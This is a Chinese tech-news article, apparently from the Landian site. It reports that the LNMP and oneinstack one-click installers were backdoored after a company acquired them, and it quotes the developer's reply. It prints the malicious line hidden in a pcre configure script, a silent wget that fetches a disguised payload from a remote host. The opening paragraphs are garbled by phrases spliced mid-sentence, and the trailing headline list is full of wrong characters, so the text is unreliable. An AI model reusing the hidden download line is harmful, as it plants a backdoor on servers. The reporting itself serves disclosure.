继LNMP后oneinstack也被添加了后门程序 建议用户不要使用这类脚本 – 蓝点网
9 月下旬,继L建议脚本国内安全公司发现知名 Web 集成环境安装脚本 “lnmp 一键安装包” 被投毒,后后门开发者、也被用户用类站长、添加企业 IT 管理员下载的程序一键安装包被加了后门程序。
当时我们都以为这是不使 LNMP 一键安装包的服务器被黑了 (LNMP.org),不过后来有网友发现 LNMP 一键安装包已经被金华市矜贵网络科技有限公司 (下称金华矜贵) 收购。蓝点
而关于安装包被投毒问题金华矜贵没有发布任何声明,继L建议脚本LNMP 论坛的后后门发帖也遭到管理员删除。

现在来看这并不是也被用户用类服务器被黑了,因为被金华矜贵收购的添加另一个集成环境安装脚本 oneinstack 也被发现投毒,所以情况很明了了:那就是程序根本不是服务器被黑,而是不使他们自己在脚本里插入了恶意代码,用来下载某些恶意软件,蓝点进而可以控制大量网站或服务器,继L建议脚本但具体目的尚不清楚。
目前在 GitHub 和 V2EX 上已经有帖子在讨论这件事,鉴于金华矜贵还试图收购秋水逸冰的 lamp.sh 一键安装包 (但被秋大拒绝了),他们后续可能还会盯上其他一键安装包,因此建议大家不要再使用这类一键安装包,否则自己的网站或服务器可能也会变成肉鸡。
更新:oneinstack 开发者回应称:金华市矜贵网络科技有限公司收购现有的几个面板以及安装包主要是为了布局类似宝塔的产品。想依赖 oneinstack 打开知名度。公司作为项目的投资商。协商的协议为公司为项目提供开发资金,并提供所有服务器资源。但是项目的管理权限以及运维权限都在我手中。目前各位开发者的精力主要是进行新的面板开发,对于出现本次被挂马事故主要原因在于我们没有对项目进行及时的管理。后续会加强安全措施。杜绝该问题的出现。
恶意代码藏在图片里:
pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
详细请看 GitHub 讨论:https://github.com/oneinstack/oneinstack/issues/511
(责任编辑:热点)
- 崩坏:星穹铁讲2.4版本将于7月31日更新,裸足少女云璃限时获得!
- 1000人正在开辟!《刺客疑条4》建制团队创新下
- 《三国群英传8》更新补丁公布 晋降玩家游戏体验
- 《真况足球2014》战齐新引擎FOX将于下周公布
- 《地球陨落》上市宣传片放出 将来DLC全免费
- 到底谁是武神 《女妖》比武竞技名利单支
- 《星际争霸2:虫群之心》先容影片 “接掌军权”先容
- 《堡垒之夜》确认铁决斗苦兵士即将到去 将推出联动皮肤
- 虚幻5悬疑冒险游戏《无人愿死》开场45分钟实机演示公布
- 《巫师3:狂猎(The Witcher 3: Wild Hunt)》最新细节:主线少50个小时 PC战主机UI界里完整分歧
- 《好国终日(The Last of Us)》新截图放出 小LOLI越改越像奶茶妹?
- 《热热周游天下》单语版暴光 日本顶级声劣倾情献声
- 两只小懒熊买西瓜的故事
- Steam《农场经理2021》序章试玩上线 2021年第一季度收止正式版
- 《喷射战士2》玩家开挂占据天梯 只为警示任天堂反外挂
- 戚闲战略RPG足游《怯者逗饥龙》社会人物大年夜治斗
- 公止研收安康码演示App 41岁男人已被刑事强迫措置
- 《气愤的小鸟三部直》新DLC公布 粉鸟出战
- 《四海兄弟:最终版》即将在8月份登陆Game Pass
- 33个短篇可骇故事 惊悚解稀游戏《戾讲》18日出售
- 神仙道3神阙风物志第三章图文攻略 views+
- 过去未来皆为枝丫,《时空中的绘旅人》全新主线「幻晶都市·分化之章」3月29日开启! views+
- 云顶之弈9.23海洋法阵容教学 云顶之弈9.23海洋法玩法攻略 views+
- FIFA14火爆程度令人咋舌 每分钟进1.1万球 views+
- 三国志战略版骁健神行战法厉害吗?骁健神行战法搭配及强度分析[视频][多图] views+
- 堡垒之夜电厂附近的圆环在哪 堡垒之夜跳伞通过电厂附近的圆环攻略 views+
- 【倒计时3天】蓄势待发,6月28日新石器时代与孙燕姿遇见有萌宠的夏天! views+
- 动作冒险《高难度跳蛋游戏》Steam页面上线 支持中文 views+
- 冒险与挖矿挖矿怎么玩 挖矿玩法介绍[图] views+
- 《上古卷轴5》托马斯蒸汽火车MOD公布 views+
